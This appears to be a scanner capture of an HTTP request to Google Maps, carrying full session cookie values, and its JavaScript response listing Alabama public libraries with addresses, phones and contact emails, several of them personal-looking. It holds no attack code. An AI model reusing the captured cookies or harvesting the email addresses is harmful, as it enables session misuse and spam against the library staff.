Host: maps.google.com
Proxy-Connection: keep-alive
Referer: http://www.alabama.gov/portal/index.jsp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=DEntMOM-vLiKsZ_1SG3HUd0B0oGbRKXtRpi1pq3lEVMkOSBMrvdVv72rCBr0341W89kHA-PBZDI3vmV4fFluvryIdICZc8i1bWqGwoBC29F_oZvehlhP4A1MlN_8jpYE

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 30 Apr 2011 00:36:51 GMT
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 30 Apr 2011 00:36:51 GMT
Server: mfe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 74286

_xdc_._lgn3tnqv3 && _xdc_._lgn3tnqv3({"name":"http://www.alabama.gov/rss/maps_LIBRARIES.kml","Status":{"code":200,"request":"geoxml"},viewport: {center: {lat: 32.656876,lng: -86.656030},span: {lat: 0.
...[SNIP]...
nty Library",description:"\x3cb\x3eSt. Clair County Library\x3c/b\x3e\x3cbr\x3e139 5th Avenue\x3cbr\x3eAshville, AL 35953-0308\x3cbr\x3e205-594-3694\x3cbr\x3e205-594-3695\x3cbr\x3e\x3ca href=\"mailto:judy6290@lycos.com\" target=\"_blank\"\x3ejudy6290@lycos.com\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.stclaircountyal.com/libraries/scc_lib.htm\" target=\"_blank\"\x3ehttp://www.stclaircountyal.com/libraries/scc_lib.htm\x3c/a\x3e",infoWindow:{title:"St. Clair
...[SNIP]...
205-594-3694205-59",dscr:"\x3cb\x3eSt. Clair County Library\x3c/b\x3e\x3cbr\x3e139 5th Avenue\x3cbr\x3eAshville, AL 35953-0308\x3cbr\x3e205-594-3694\x3cbr\x3e205-594-3695\x3cbr\x3e\x3ca href=\"mailto:judy6290@lycos.com\" target=\"_blank\"\x3ejudy6290@lycos.com\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.stclaircountyal.com/libraries/scc_lib.htm\" target=\"_blank\"\x3ehttp://www.stclaircountyal.com/libraries/scc_lib.htm\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"htt
...[SNIP]...
emorial Library",description:"\x3cb\x3eHightower Memorial Library\x3c/b\x3e\x3cbr\x3e630 Avenue A\x3cbr\x3eYork, AL 36925-2604\x3cbr\x3e205-392-2004\x3cbr\x3e205-392-9121\x3cbr\x3e\x3ca href=\"mailto:thlgm1@yahoo.com\" target=\"_blank\"\x3ethlgm1@yahoo.com\x3c/a\x3e",infoWindow:{title:"Hightower Memorial Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Hightower Memorial Library630 Avenue AYork, AL 36925-2604205-392-2004205-392-91",dscr:"\x3cb\x3eHightower Memorial Library\x3c/b\x3e\x3cbr\x3e630 Avenue A\x3cbr\x3eYork, AL 36925-2604\x3cbr\x3e205-392-2004\x3cbr\x3e205-392-9121\x3cbr\x3e\x3ca href=\"mailto:thlgm1@yahoo.com\" target=\"_blank\"\x3ethlgm1@yahoo.com\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=32.483370,-88.295000\x26thumb=0",photoType:2},ss:{edit:false,detailseditable:false,deleted:false,r
...[SNIP]...
escription:"\x3cb\x3eRuby Pickens Tartt Public Library\x3c/b\x3e\x3cbr\x3e206 Monroe Street\x3cbr\x3eLivingston, AL 35470-0377\x3cbr\x3e205-652-2349\x3cbr\x3e205-652-2349\x3cbr\x3e\x3ca href=\"mailto:rptlibrary@bellsouth.net\" target=\"_blank\"\x3erptlibrary@bellsouth.net\x3c/a\x3e",infoWindow:{title:"Ruby Pickens Tartt Public Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Ruby Pickens Tartt Public Library206 Monroe StreetLivingston, AL 35470-037
...[SNIP]...
205-",dscr:"\x3cb\x3eRuby Pickens Tartt Public Library\x3c/b\x3e\x3cbr\x3e206 Monroe Street\x3cbr\x3eLivingston, AL 35470-0377\x3cbr\x3e205-652-2349\x3cbr\x3e205-652-2349\x3cbr\x3e\x3ca href=\"mailto:rptlibrary@bellsouth.net\" target=\"_blank\"\x3erptlibrary@bellsouth.net\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=32.584262,-88.189439\x26thumb=0",photoType:2},ss:{edit:false,detailseditable:false,deleted:false,r
...[SNIP]...
em",description:"\x3cb\x3eSumter County Library System\x3c/b\x3e\x3cbr\x3eWashington Street\x3cbr\x3eLivingston, AL 35470-0377\x3cbr\x3e205-652-2349\x3cbr\x3e205-652-6688\x3cbr\x3e\x3ca href=\"mailto:rptlibrary@bellsouth.net\" target=\"_blank\"\x3erptlibrary@bellsouth.net\x3c/a\x3e",infoWindow:{title:"Sumter County Library System",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Sumter County Library SystemWashington StreetLivingston, AL 35470-0377205-652-2",dscr:"\x3cb\x3eSumter County Library System\x3c/b\x3e\x3cbr\x3eWashington Street\x3cbr\x3eLivingston, AL 35470-0377\x3cbr\x3e205-652-2349\x3cbr\x3e205-652-6688\x3cbr\x3e\x3ca href=\"mailto:rptlibrary@bellsouth.net\" target=\"_blank\"\x3erptlibrary@bellsouth.net\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=32.570890,-88.139476\x26thumb=0",photoType:2},ss:{edit:false,detailseditable:false,deleted:false,r
...[SNIP]...
tion:"\x3cb\x3eEarle A. Rainwater Memorial Library\x3c/b\x3e\x3cbr\x3e124 Ninth Avenue SW\x3cbr\x3eChildersburg, AL 35044-1642\x3cbr\x3e256-378-7239\x3cbr\x3e256-378-7287\x3cbr\x3e\x3ca href=\"mailto:brich@childersburg.org\" target=\"_blank\"\x3ebrich@childersburg.org\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.cheaharegionallibrary.org\" target=\"_blank\"\x3ehttp://www.cheaharegionallibrary.org\x3c/a\x3e",infoWindow:{title:"Earle A. Rainwater Memorial Library",basi
...[SNIP]...
dscr:"\x3cb\x3eEarle A. Rainwater Memorial Library\x3c/b\x3e\x3cbr\x3e124 Ninth Avenue SW\x3cbr\x3eChildersburg, AL 35044-1642\x3cbr\x3e256-378-7239\x3cbr\x3e256-378-7287\x3cbr\x3e\x3ca href=\"mailto:brich@childersburg.org\" target=\"_blank\"\x3ebrich@childersburg.org\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.cheaharegionallibrary.org\" target=\"_blank\"\x3ehttp://www.cheaharegionallibrary.org\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=t
...[SNIP]...
blic Library",description:"\x3cb\x3eLincoln Public Library\x3c/b\x3e\x3cbr\x3e49 Complex Drive\x3cbr\x3eLincoln, AL 35096-5096\x3cbr\x3e205-763-7244\x3cbr\x3e205-763-7244\x3cbr\x3e\x3ca href=\"mailto:lincolnpubliclibrary@lincolnalabama.com\" target=\"_blank\"\x3elincolnpubliclibrary@lincolnalabama.com\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.cheaharegionallibrary.org\" target=\"_blank\"\x3ehttp://www.cheaharegionallibrary.org\x3c/a\x3e",infoWindow:{title:"Lincoln Public Library",basics:"\x3cdiv t
...[SNIP]...
205-763-7244205-763",dscr:"\x3cb\x3eLincoln Public Library\x3c/b\x3e\x3cbr\x3e49 Complex Drive\x3cbr\x3eLincoln, AL 35096-5096\x3cbr\x3e205-763-7244\x3cbr\x3e205-763-7244\x3cbr\x3e\x3ca href=\"mailto:lincolnpubliclibrary@lincolnalabama.com\" target=\"_blank\"\x3elincolnpubliclibrary@lincolnalabama.com\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.cheaharegionallibrary.org\" target=\"_blank\"\x3ehttp://www.cheaharegionallibrary.org\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=t
...[SNIP]...
ibrary",description:"\x3cb\x3eTalladega Public Library\x3c/b\x3e\x3cbr\x3e202 South Street E\x3cbr\x3eTalladega, AL 35160-2471\x3cbr\x3e256-362-4211\x3cbr\x3e256-362-0653\x3cbr\x3e\x3ca href=\"mailto:talladeg@hiwaay.net\" target=\"_blank\"\x3etalladeg@hiwaay.net\x3c/a\x3e",infoWindow:{title:"Talladega Public Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Talladega Public Library202 South Street ETalladega, AL 35160-2471256-362-42112",dscr:"\x3cb\x3eTalladega Public Library\x3c/b\x3e\x3cbr\x3e202 South Street E\x3cbr\x3eTalladega, AL 35160-2471\x3cbr\x3e256-362-4211\x3cbr\x3e256-362-0653\x3cbr\x3e\x3ca href=\"mailto:talladeg@hiwaay.net\" target=\"_blank\"\x3etalladeg@hiwaay.net\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=33.433304,-86.098910\x26thumb=0",photoType:2},ss:{edit:false,detailseditable:false,deleted:false,r
...[SNIP]...
iption:"\x3cb\x3eAdelia McConnell Russell Library\x3c/b\x3e\x3cbr\x3e318 Church Street\x3cbr\x3eAlexander City, AL 35010-5010\x3cbr\x3e256-329-6796\x3cbr\x3e256-329-6797\x3cbr\x3e\x3ca href=\"mailto: ALexcity@amrlibrary.net\" target=\"_blank\"\x3e ALexcity@amrlibrary.net\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.alexandercityonline.com/library.htm\" target=\"_blank\"\x3ehttp://www.alexandercityonline.com/library.htm\x3c/a\x3e",infoWindow:{title:"Adelia McConnell Russ
...[SNIP]...
",dscr:"\x3cb\x3eAdelia McConnell Russell Library\x3c/b\x3e\x3cbr\x3e318 Church Street\x3cbr\x3eAlexander City, AL 35010-5010\x3cbr\x3e256-329-6796\x3cbr\x3e256-329-6797\x3cbr\x3e\x3ca href=\"mailto: ALexcity@amrlibrary.net\" target=\"_blank\"\x3e ALexcity@amrlibrary.net\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.alexandercityonline.com/library.htm\" target=\"_blank\"\x3ehttp://www.alexandercityonline.com/library.htm\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.goo
...[SNIP]...
ry",description:"\x3cb\x3eDadeville Public Library\x3c/b\x3e\x3cbr\x3e205 North West Street\x3cbr\x3eDadeville , AL 36853-1355\x3cbr\x3e256-825-7820\x3cbr\x3e256-825-7820\x3cbr\x3e\x3ca href=\"mailto:dpl@lakemartin.net\" target=\"_blank\"\x3edpl@lakemartin.net\x3c/a\x3e",infoWindow:{title:"Dadeville Public Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Dadeville Public Library205 North West StreetDadeville , AL 36853-1355256-825-7",dscr:"\x3cb\x3eDadeville Public Library\x3c/b\x3e\x3cbr\x3e205 North West Street\x3cbr\x3eDadeville , AL 36853-1355\x3cbr\x3e256-825-7820\x3cbr\x3e256-825-7820\x3cbr\x3e\x3ca href=\"mailto:dpl@lakemartin.net\" target=\"_blank\"\x3edpl@lakemartin.net\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=32.832047,-85.765410\x26thumb=0",photoType:2},ss:{edit:false,detailseditable:false,deleted:false,r
...[SNIP]...
cription:"\x3cb\x3eHorseshoe Bend Regioanl Library\x3c/b\x3e\x3cbr\x3e207 North West Street\x3cbr\x3eDadeville , AL 36853-1355\x3cbr\x3e256-825-9232\x3cbr\x3e256-825-4314\x3cbr\x3e\x3ca href=\"mailto:hbrl@lakemartin.net\" target=\"_blank\"\x3ehbrl@lakemartin.net\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.mindspring.com/\" target=\"_blank\"\x3ehttp://www.mindspring.com/\"hbrl/hbrl.html\x3c/a\x3e",infoWindow:{title:"Horseshoe Bend Regioanl Library",basics:"\x3c
...[SNIP]...
25",dscr:"\x3cb\x3eHorseshoe Bend Regioanl Library\x3c/b\x3e\x3cbr\x3e207 North West Street\x3cbr\x3eDadeville , AL 36853-1355\x3cbr\x3e256-825-9232\x3cbr\x3e256-825-4314\x3cbr\x3e\x3ca href=\"mailto:hbrl@lakemartin.net\" target=\"_blank\"\x3ehbrl@lakemartin.net\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.mindspring.com/\" target=\"_blank\"\x3ehttp://www.mindspring.com/\"hbrl/hbrl.html\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumb
...[SNIP]...
rary",description:"\x3cb\x3eTallassee Community Library\x3c/b\x3e\x3cbr\x3e99 Freeman Avenue\x3cbr\x3eTallassee, AL 36078-2055\x3cbr\x3e334-283-2732\x3cbr\x3e334-283-2732\x3cbr\x3e\x3ca href=\"mailto:tallasseecitylib@elmore.rr.com\" target=\"_blank\"\x3etallasseecitylib@elmore.rr.com\x3c/a\x3e\x3cbr\x3e\x3ca href=\"www.tallasseelibrary.org\" target=\"_blank\"\x3ewww.tallasseelibrary.org\x3c/a\x3e",infoWindow:{title:"Tallassee Community Library",basics:"\x3cdiv transclude=\"iw\"\x3
...[SNIP]...
334-283-273",dscr:"\x3cb\x3eTallassee Community Library\x3c/b\x3e\x3cbr\x3e99 Freeman Avenue\x3cbr\x3eTallassee, AL 36078-2055\x3cbr\x3e334-283-2732\x3cbr\x3e334-283-2732\x3cbr\x3e\x3ca href=\"mailto:tallasseecitylib@elmore.rr.com\" target=\"_blank\"\x3etallasseecitylib@elmore.rr.com\x3c/a\x3e\x3cbr\x3e\x3ca href=\"www.tallasseelibrary.org\" target=\"_blank\"\x3ewww.tallasseelibrary.org\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68
...[SNIP]...
description:"\x3cb\x3eTuscaloosa Public Library\x3c/b\x3e\x3cbr\x3e1801 Jack Warner Parkway\x3cbr\x3eTuscaloosa, AL 35401-1099\x3cbr\x3e205-345-5820\x3cbr\x3e205-752-8300\x3cbr\x3e\x3ca href=\"mailto:npack@tuscaloosa-library.org\" target=\"_blank\"\x3enpack@tuscaloosa-library.org\x3c/a\x3e\x3cbr\x3e\x3ca href=\"www.tuscaloosa-library.org\" target=\"_blank\"\x3ewww.tuscaloosa-library.org\x3c/a\x3e",infoWindow:{title:"Tuscaloosa Public Library",basics:"\x3cdiv transclude=\"iw\"\
...[SNIP]...
205-3",dscr:"\x3cb\x3eTuscaloosa Public Library\x3c/b\x3e\x3cbr\x3e1801 Jack Warner Parkway\x3cbr\x3eTuscaloosa, AL 35401-1099\x3cbr\x3e205-345-5820\x3cbr\x3e205-752-8300\x3cbr\x3e\x3ca href=\"mailto:npack@tuscaloosa-library.org\" target=\"_blank\"\x3enpack@tuscaloosa-library.org\x3c/a\x3e\x3cbr\x3e\x3ca href=\"www.tuscaloosa-library.org\" target=\"_blank\"\x3ewww.tuscaloosa-library.org\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26
...[SNIP]...
ic Library",description:"\x3cb\x3eMillport Public Library\x3c/b\x3e\x3cbr\x3e920 Black Street\x3cbr\x3eMillport, AL 35576-0159\x3cbr\x3e205-662-4286\x3cbr\x3e205-662-4968\x3cbr\x3e\x3ca href=\"mailto:millportlibrary@bamacomm.com\" target=\"_blank\"\x3emillportlibrary@bamacomm.com\x3c/a\x3e",infoWindow:{title:"Millport Public Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Millport Public Library920 Black StreetMillport, AL 35576-0159205-662-4286205-6",dscr:"\x3cb\x3eMillport Public Library\x3c/b\x3e\x3cbr\x3e920 Black Street\x3cbr\x3eMillport, AL 35576-0159\x3cbr\x3e205-662-4286\x3cbr\x3e205-662-4968\x3cbr\x3e\x3ca href=\"mailto:millportlibrary@bamacomm.com\" target=\"_blank\"\x3emillportlibrary@bamacomm.com\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=33.561495,-88.080025\x26thumb=0",photoType:2},ss:{edit:false,detailseditable:false,deleted:false,r
...[SNIP]...
ic Library",description:"\x3cb\x3eSulligent Public Library\x3c/b\x3e\x3cbr\x3e514 Elm Street\x3cbr\x3eSulligent, AL 35586-0215\x3cbr\x3e205-698-8631\x3cbr\x3e205-698-0232\x3cbr\x3e\x3ca href=\"mailto:spl215@hotmail.com\" target=\"_blank\"\x3espl215@hotmail.com\x3c/a\x3e",infoWindow:{title:"Sulligent Public Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Sulligent Public Library514 Elm StreetSulligent, AL 35586-0215205-698-8631205-6",dscr:"\x3cb\x3eSulligent Public Library\x3c/b\x3e\x3cbr\x3e514 Elm Street\x3cbr\x3eSulligent, AL 35586-0215\x3cbr\x3e205-698-8631\x3cbr\x3e205-698-0232\x3cbr\x3e\x3ca href=\"mailto:spl215@hotmail.com\" target=\"_blank\"\x3espl215@hotmail.com\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=33.900527,-88.131882\x26thumb=0",photoType:2},ss:{edit:false,detailseditable:false,deleted:false,r
...[SNIP]...
ibrary",description:"\x3cb\x3eBurchell Campbell Library\x3c/b\x3e\x3cbr\x3e11075 Highway 101\x3cbr\x3eLexington, AL 35648-0459\x3cbr\x3e256-229-5579\x3cbr\x3e256-229-5579\x3cbr\x3e\x3ca href=\"mailto:lexlib@getaway.net\" target=\"_blank\"\x3elexlib@getaway.net\x3c/a\x3e",infoWindow:{title:"Burchell Campbell Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Burchell Campbell Library11075 Highway 101Lexington, AL 35648-0459256-229-55792",dscr:"\x3cb\x3eBurchell Campbell Library\x3c/b\x3e\x3cbr\x3e11075 Highway 101\x3cbr\x3eLexington, AL 35648-0459\x3cbr\x3e256-229-5579\x3cbr\x3e256-229-5579\x3cbr\x3e\x3ca href=\"mailto:lexlib@getaway.net\" target=\"_blank\"\x3elexlib@getaway.net\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=34.969420,-87.370581\x26thumb=0",photoType:2},ss:{edit:false,detailseditable:false,deleted:false,r
...[SNIP]...
ription:"\x3cb\x3eFlorence-Lauderdale Public Library\x3c/b\x3e\x3cbr\x3e350 North Wood Avenue\x3cbr\x3eFlorence, AL 35630-4706\x3cbr\x3e256-764-6564\x3cbr\x3e256-764-6629\x3cbr\x3e\x3ca href=\"mailto:nsanford@fpl.lib.al.us\" target=\"_blank\"\x3ensanford@fpl.lib.al.us\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.flpl.lib.al.us\" target=\"_blank\"\x3ehttp://www.flpl.lib.al.us\x3c/a\x3e",infoWindow:{title:"Florence-Lauderdale Public Library",basics:"\x3cdiv transclude=
...[SNIP]...
2",dscr:"\x3cb\x3eFlorence-Lauderdale Public Library\x3c/b\x3e\x3cbr\x3e350 North Wood Avenue\x3cbr\x3eFlorence, AL 35630-4706\x3cbr\x3e256-764-6564\x3cbr\x3e256-764-6629\x3cbr\x3e\x3ca href=\"mailto:nsanford@fpl.lib.al.us\" target=\"_blank\"\x3ensanford@fpl.lib.al.us\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.flpl.lib.al.us\" target=\"_blank\"\x3ehttp://www.flpl.lib.al.us\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=
...[SNIP]...
lic Library",description:"\x3cb\x3eKillen Public Library\x3c/b\x3e\x3cbr\x3e325 J C Mauldin Hwy\x3cbr\x3eKillen, AL 35645-0542\x3cbr\x3e256-757-5471\x3cbr\x3e256-757-5471\x3cbr\x3e\x3ca href=\"mailto:killenlibrary@bellsouth.net\" target=\"_blank\"\x3ekillenlibrary@bellsouth.net\x3c/a\x3e",infoWindow:{title:"Killen Public Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Killen Public Library325 J C Mauldin HwyKillen, AL 35645-0542256-757-5471256-75",dscr:"\x3cb\x3eKillen Public Library\x3c/b\x3e\x3cbr\x3e325 J C Mauldin Hwy\x3cbr\x3eKillen, AL 35645-0542\x3cbr\x3e256-757-5471\x3cbr\x3e256-757-5471\x3cbr\x3e\x3ca href=\"mailto:killenlibrary@bellsouth.net\" target=\"_blank\"\x3ekillenlibrary@bellsouth.net\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=34.859253,-87.540890\x26thumb=0",photoType:2},ss:{edit:false,detailseditable:false,deleted:false,r
...[SNIP]...
ription:"\x3cb\x3eLauderdale County Regional Library\x3c/b\x3e\x3cbr\x3e250 North Wood Avenue\x3cbr\x3eFlorence, AL 35630-4706\x3cbr\x3e256-764-6564\x3cbr\x3e256-764-6629\x3cbr\x3e\x3ca href=\"mailto:nsanford@flpl.lib.al.us\" target=\"_blank\"\x3ensanford@flpl.lib.al.us\x3c/a\x3e",infoWindow:{title:"Lauderdale County Regional Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Lauderdale County Regional Library250 North Wood AvenueFlorence, AL 35630
...[SNIP]...
2",dscr:"\x3cb\x3eLauderdale County Regional Library\x3c/b\x3e\x3cbr\x3e250 North Wood Avenue\x3cbr\x3eFlorence, AL 35630-4706\x3cbr\x3e256-764-6564\x3cbr\x3e256-764-6629\x3cbr\x3e\x3ca href=\"mailto:nsanford@flpl.lib.al.us\" target=\"_blank\"\x3ensanford@flpl.lib.al.us\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=34.802722,-87.673971\x26thumb=0",photoType:2},ss:{edit:false,detailseditable:false,deleted:false,r
...[SNIP]...
ibrary",description:"\x3cb\x3eRogersville Public Library\x3c/b\x3e\x3cbr\x3e74 Bank Street\x3cbr\x3eRogersville, AL 35652-0190\x3cbr\x3e256-247-0151\x3cbr\x3e256-247-0144\x3cbr\x3e\x3ca href=\"mailto:ropublib@bellsouth.net\" target=\"_blank\"\x3eropublib@bellsouth.net\x3c/a\x3e",infoWindow:{title:"Rogersville Public Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Rogersville Public Library74 Bank StreetRogersville, AL 35652-0190256-247-01512",dscr:"\x3cb\x3eRogersville Public Library\x3c/b\x3e\x3cbr\x3e74 Bank Street\x3cbr\x3eRogersville, AL 35652-0190\x3cbr\x3e256-247-0151\x3cbr\x3e256-247-0144\x3cbr\x3e\x3ca href=\"mailto:ropublib@bellsouth.net\" target=\"_blank\"\x3eropublib@bellsouth.net\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68\x26ll=34.824642,-87.291418\x26thumb=0",photoType:2},ss:{edit:false,detailseditable:false,deleted:false,r
...[SNIP]...
me:"Courtland Public Library",description:"\x3cb\x3eCourtland Public Library\x3c/b\x3e\x3cbr\x3e215 College Street\x3cbr\x3eCourtland, AL 35618-0171\x3cbr\x3e256-637-9988\x3cbr\x3e\x3ca href=\"mailto:bamaoz@earthlink.net\" target=\"_blank\"\x3ebamaoz@earthlink.net\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.lmn.lib.al.us\" target=\"_blank\"\x3ehttp://www.lmn.lib.al.us\x3c/a\x3e",infoWindow:{title:"Courtland Public Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x
...[SNIP]...
rtland, AL 35618-0171256-637-9988b",dscr:"\x3cb\x3eCourtland Public Library\x3c/b\x3e\x3cbr\x3e215 College Street\x3cbr\x3eCourtland, AL 35618-0171\x3cbr\x3e256-637-9988\x3cbr\x3e\x3ca href=\"mailto:bamaoz@earthlink.net\" target=\"_blank\"\x3ebamaoz@earthlink.net\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.lmn.lib.al.us\" target=\"_blank\"\x3ehttp://www.lmn.lib.al.us\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90\x26h=68
...[SNIP]...
y",description:"\x3cb\x3eLawrence County Public Libraray\x3c/b\x3e\x3cbr\x3e401 College Street\x3cbr\x3eMoulton, AL 35650-1483\x3cbr\x3e256-974-0883\x3cbr\x3e256-974-0890\x3cbr\x3e\x3ca href=\"mailto:mirandaball@hotmail.com\" target=\"_blank\"\x3emirandaball@hotmail.com\x3c/a\x3e\x3cbr\x3e\x3ca href=\"www.lawrencecountypublic.org\" target=\"_blank\"\x3ewww.lawrencecountypublic.org\x3c/a\x3e",infoWindow:{title:"Lawrence County Public Libraray",basics:"\x3cdiv transclu
...[SNIP]...
256-974-",dscr:"\x3cb\x3eLawrence County Public Libraray\x3c/b\x3e\x3cbr\x3e401 College Street\x3cbr\x3eMoulton, AL 35650-1483\x3cbr\x3e256-974-0883\x3cbr\x3e256-974-0890\x3cbr\x3e\x3ca href=\"mailto:mirandaball@hotmail.com\" target=\"_blank\"\x3emirandaball@hotmail.com\x3c/a\x3e\x3cbr\x3e\x3ca href=\"www.lawrencecountypublic.org\" target=\"_blank\"\x3ewww.lawrencecountypublic.org\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=thumbnail\x26w=90
...[SNIP]...
c Library",description:"\x3cb\x3eAuburn Public Library\x3c/b\x3e\x3cbr\x3e749 East Thach Avenue\x3cbr\x3eAuburn, AL 36830-4803\x3cbr\x3e334-501-3190\x3cbr\x3e334-501-1593\x3cbr\x3e\x3ca href=\"mailto:mhuffman@auburnalabama.org\" target=\"_blank\"\x3emhuffman@auburnalabama.org\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.auburnalabama.org/library\" target=\"_blank\"\x3ehttp://www.auburnalabama.org/library\x3c/a\x3e",infoWindow:{title:"Auburn Public Library",basics:"\x3cdiv tr
...[SNIP]...
334-501-3190334-",dscr:"\x3cb\x3eAuburn Public Library\x3c/b\x3e\x3cbr\x3e749 East Thach Avenue\x3cbr\x3eAuburn, AL 36830-4803\x3cbr\x3e334-501-3190\x3cbr\x3e334-501-1593\x3cbr\x3e\x3ca href=\"mailto:mhuffman@auburnalabama.org\" target=\"_blank\"\x3emhuffman@auburnalabama.org\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.auburnalabama.org/library\" target=\"_blank\"\x3ehttp://www.auburnalabama.org/library\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=t
...[SNIP]...
escription:"\x3cb\x3eLewis Cooper Jr. Memorial Library\x3c/b\x3e\x3cbr\x3e200 South 6th Street\x3cbr\x3eOpelika, AL 36801-0125\x3cbr\x3e334-705-5380\x3cbr\x3e334-705-5881\x3cbr\x3e\x3ca href=\"mailto:mwjones@ci.opelika.al.us\" target=\"_blank\"\x3emwjones@ci.opelika.al.us\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.opelika.org/depts/library\" target=\"_blank\"\x3ehttp://www.opelika.org/depts/library\x3c/a\x3e",infoWindow:{title:"Lewis Cooper Jr. Memorial Library",basics
...[SNIP]...
334-",dscr:"\x3cb\x3eLewis Cooper Jr. Memorial Library\x3c/b\x3e\x3cbr\x3e200 South 6th Street\x3cbr\x3eOpelika, AL 36801-0125\x3cbr\x3e334-705-5380\x3cbr\x3e334-705-5881\x3cbr\x3e\x3ca href=\"mailto:mwjones@ci.opelika.al.us\" target=\"_blank\"\x3emwjones@ci.opelika.al.us\x3c/a\x3e\x3cbr\x3e\x3ca href=\"http://www.opelika.org/depts/library\" target=\"_blank\"\x3ehttp://www.opelika.org/depts/library\x3c/a\x3e",dscr_dir:"ltr",photoUrl:"http://cbk0.google.com/cbk?output=t
...[SNIP]...
scription:"\x3cb\x3eAttalla-Etowah Co. Public Library\x3c/b\x3e\x3cbr\x3e604 North 4th Street \x3cbr\x3eAttalla, AL 35954-9266\x3cbr\x3e256-538-9266\x3cbr\x3e256-538-9223\x3cbr\x3e\x3ca href=\"mailto:lspears@microxl.com\" target=\"_blank\"\x3elspears@microxl.com\x3c/a\x3e",infoWindow:{title:"Attalla-Etowah Co. Public Library",basics:"\x3cdiv transclude=\"iw\"\x3e\x3c/div\x3e",snippet:"Attalla-Etowah Co. Public Library604 North 4th Street Attalla, AL 35954-92
...[SNIP]...
